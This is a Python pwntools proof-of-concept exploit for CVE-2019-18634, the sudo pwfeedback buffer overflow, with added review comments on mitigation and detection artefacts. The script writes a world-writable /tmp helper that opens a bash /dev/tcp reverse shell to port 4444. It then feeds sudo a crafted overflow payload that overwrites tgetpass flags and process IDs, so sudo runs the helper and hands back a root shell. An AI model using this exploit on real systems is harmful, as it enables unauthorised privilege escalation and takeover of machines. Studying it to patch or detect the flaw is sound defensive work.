CVE-2019-18634.py
#!/usr/bin/env python2
import sys,os
from pwn import *
# Canonical path of the sudo binary that the __main__ block launches;
# realpath() follows any symlinks on /usr/bin/sudo.
TARGET = os.path.realpath(
    "/usr/bin/sudo"
)
def setFlags(flags):
    """Return the integer bitmask for a "|"-separated list of TGP_* names.

    Each name is looked up in the table below and OR-ed into the result,
    so a repeated name has no extra effect. A name that is not in the
    table raises KeyError.

    NOTE(review): the values presumably mirror the tgetpass flag constants
    in sudo's source; confirm against the sudo version under test.
    """
    bit_for_name = dict(
        TGP_NOECHO=0x00,
        TGP_ECHO=0x01,
        TGP_STDIN=0x02,
        TGP_ASKPASS=0x04,
        TGP_MASK=0x08,
        TGP_NOECHO_TRY=0x10,
    )
    combined = 0
    for name in flags.split("|"):
        combined = combined | bit_for_name[name]
    return combined
def getFlags(intFlag):
    """Return the "|"-joined TGP_* names for the bits set in intFlag.

    Zero maps to "TGP_NOECHO". Bits are reported from lowest to highest.
    A set bit with no entry in the table raises KeyError, and a negative
    value yields an empty string because the scan never starts.
    """
    name_for_bit = {
        0x00: "TGP_NOECHO",
        0x01: "TGP_ECHO",
        0x02: "TGP_STDIN",
        0x04: "TGP_ASKPASS",
        0x08: "TGP_MASK",
        0x10: "TGP_NOECHO_TRY",
    }
    if intFlag == 0:
        return name_for_bit[intFlag]

    names = []
    bit = 1
    # Walk single-bit masks upwards until they exceed the value.
    while bit <= intFlag:
        if intFlag & bit:
            names.append(name_for_bit[bit])
        bit <<= 1
    return "|".join(names)
if __name__ == "__main__":
    # Proof-of-concept driver for CVE-2019-18634, run against the local sudo
    # binary in TARGET and connecting back only to 127.0.0.1.
    # NOTE(review): this CVE is the sudo `pwfeedback` buffer overflow. It is
    # only reachable when `pwfeedback` is enabled in sudoers, so a patched
    # sudo or `Defaults !pwfeedback` removes the exposure. Confirm against
    # the vendor advisory.
    #
    # Host artefacts this script produces, useful when writing detections:
    #   - /tmp/rs.sh, mode 0777, containing a bash /dev/tcp redirect
    #   - a listener on TCP 4444 and a loopback connection to it
    #   - sudo started with -S, SUDO_ASKPASS pointing into /tmp, stdin on a pty

    # Write the askpass helper: a shell script that attaches an interactive
    # bash to 127.0.0.1:4444.
    with open("/tmp/rs.sh", "w") as file:
        file.write("""#!/bin/bash
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
""")
    # 0o777 makes the helper executable but also world-writable, in a
    # world-writable directory and under a fixed name.
    os.chmod("/tmp/rs.sh", 0o777)
    # pwntools listener that receives the connection made by rs.sh.
    r=listen(4444)
    # Create a pty pair. The slave side is reopened read-only and handed to
    # sudo as stdin; the payload is later written to the master side.
    mfd, sfd = os.openpty()
    fd = os.open(os.ttyname(sfd), os.O_RDONLY)
    # -S tells sudo to read the password from stdin; SUDO_ASKPASS names the
    # helper program sudo runs when it is in askpass mode.
    p = process([TARGET,"-S", "id"],env={'SUDO_ASKPASS':"/tmp/rs.sh"}, stdin=fd)
    # Payload: 548 repetitions of NUL followed by 0x15, then an 8-byte value
    # with TGP_STDIN|TGP_ASKPASS set, then 20 more NUL/0x15 pairs.
    # NOTE(review): the counts 548 and 20 presumably match the memory that
    # follows sudo's password buffer on the author's build. That layout is
    # not visible in this file and is build-specific.
    payload = "\x00\x15"*548
    payload += p64(setFlags("TGP_STDIN|TGP_ASKPASS"))
    payload += "\x00\x15"*(20)
    # PID of the spawned sudo process and of its parent (pwntools helper).
    pid = p.pid
    ppid = util.proc.parent(pid)
    # Five 32-bit values: pid, ppid, pid, pid, pid.
    # NOTE(review): which fields these land on is not shown here.
    payload += p32(pid)
    payload += p32(ppid)
    payload += p32(pid)
    payload += p32(pid)
    payload += p32(pid)
    # Three NUL bytes, then a newline to end the line.
    payload += "\x00"*3
    payload += "\n"
    # Send the whole line to sudo through the pty master.
    os.write(mfd, payload)
    # Block until rs.sh connects back, then attach the terminal to it.
    r.wait_for_connection()
    r.interactive()
    sys.exit(0)